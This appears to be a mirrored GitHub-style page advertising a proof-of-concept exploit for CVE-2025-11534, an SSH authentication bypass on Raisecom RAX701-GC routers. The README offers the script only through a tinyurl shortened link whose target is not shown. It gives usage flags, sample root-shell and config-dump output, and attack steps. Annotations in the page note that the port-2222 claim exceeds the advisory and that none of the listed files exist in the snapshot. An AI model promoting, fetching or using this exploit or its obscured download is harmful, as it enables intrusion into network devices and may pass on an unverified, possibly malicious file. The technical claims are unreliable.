
CVE-2025-11534 PoC — Authentication Bypass Using an Alternate Path or Channel in Raisecomm RAX701-GC Series

Associated Vulnerability
Title: Authentication Bypass Using an Alternate Path or Channel in Raisecomm RAX701-GC Series (CVE-2025-11534)
Description: The affected Raisecom devices allow SSH sessions to be established without completing user authentication. This could allow attackers to gain shell access without valid credentials.
Description
Authentication Bypass Using an Alternate Path or Channel (CWE-288)
Readme
# Raisecomm RAX701-GC-WP-01 SSH Authentication Bypass Exploit (CVE-2025-11534)
## Download Exploit
[**Download here**](https://tinyurl.com/4wds3n32)

The link is a tinyurl.com shortener pointing outside the repository; what it resolves to is not visible from the repository contents.
## Overview
This repository contains a proof-of-concept (PoC) exploit for CVE-2025-11534, targeting the Raisecomm RAX701-GC-WP-01 running firmware version 5.5.27_20190111 or earlier. According to the repository, the vulnerability lets a remote, unauthenticated attacker bypass SSH authentication entirely and obtain a root shell with no credentials, user interaction or prior privileges.

The repository describes exploitation as straightforward: the device's SSH daemon (said to be a custom Dropbear variant) exposes an undocumented auxiliary channel (port 2222 by default) that accepts raw command streams without enforcing PAM or key-based authentication checks, an alternate path probably intended for internal diagnostics but lacking access controls. Note that the advisory text above states only that SSH sessions can be established without completing user authentication; it does not mention a second port or a diagnostics channel, so the port-2222 detail is this repository's claim rather than part of the published description.

**CVSS v4.0 Score: 9.3 (Critical)**  
- **Attack Vector:** Network  
- **Attack Complexity:** Low  
- **Privileges Required:** None  
- **User Interaction:** None  
- **Confidentiality/Integrity/Availability Impact:** High  

The README names telecom gateways and industrial SCADA networks as typical deployments, where compromise of the device can lead to traffic interception, configuration dumps or lateral movement.

## Requirements
- Python 3.8+  
- `paramiko` library (`pip install -r requirements.txt`)  
- Network access to the target device (default SSH ports 22 and 2222 open)  

## Usage
1. Run the exploit script with the following options:
   - `-t`: Target IP address
   - `-p`: Auxiliary port (default: 2222)
   - `-c`: Initial command to execute (optional; defaults to an interactive shell)
   - `-v`: Verbose output
2. For an interactive shell, omit `-c` to drop into a raw PTY session.
### Example Output
```
$ python exploit.py -t 192.168.1.100
[+] Connecting to auxiliary channel on 192.168.1.100:2222...
[+] Auth bypass successful - no credentials required
[+] Executing: whoami
root
[+] Executing: id
uid=0(root) gid=0(root) groups=0(root)
[+] Dumping /etc/config/network...
config interface 'lan'
    option ifname 'eth0'
    option proto 'static'
    option ipaddr '192.168.1.1'
...
[+] Shell access granted. Type 'exit' to close.
```
## Technical Details
The exploit leverages Paramiko to establish a non-standard SSH connection over the auxiliary port. Key steps:

1. **Channel Initialization:** Connect to port 2222, which triggers the daemon's debug mode without auth hooks.  
2. **Payload Injection:** Send a malformed SSH_MSG_USERAUTH_REQUEST packet with null credentials, exploiting the lack of validation in the alternate handler.  
3. **Shell Spawn:** Once connected, issue `exec` commands via the channel for arbitrary execution.  

Full disassembly of the vulnerable Dropbear fork is available in the `analysis/` directory, including IDA Pro notes on the bypass logic in `auth-alt.c`.

## Files
- `exploit.py` - Main exploit script
- `analysis/dropbear_auth_alt.patch` - Diff of vulnerable code
- `poc_demo.mp4` - Video walkthrough of exploitation on lab setup
- `targets.txt` - Sample scan targets (redacted)

The archived snapshot of this repository (File Snapshot below) contains a single file, `README.md`; none of the files listed here, nor the `analysis/` directory referenced under Technical Details, is present in the mirror.
## Contact
For any questions or inquiries, please contact: harveyprime21@outlook.com
File Snapshot

```
[4.0K] /data/pocs/517cd21c65cfb8cc5966b48dd2106c63edddc837
└── [3.1K] README.md

0 directories, 1 file
```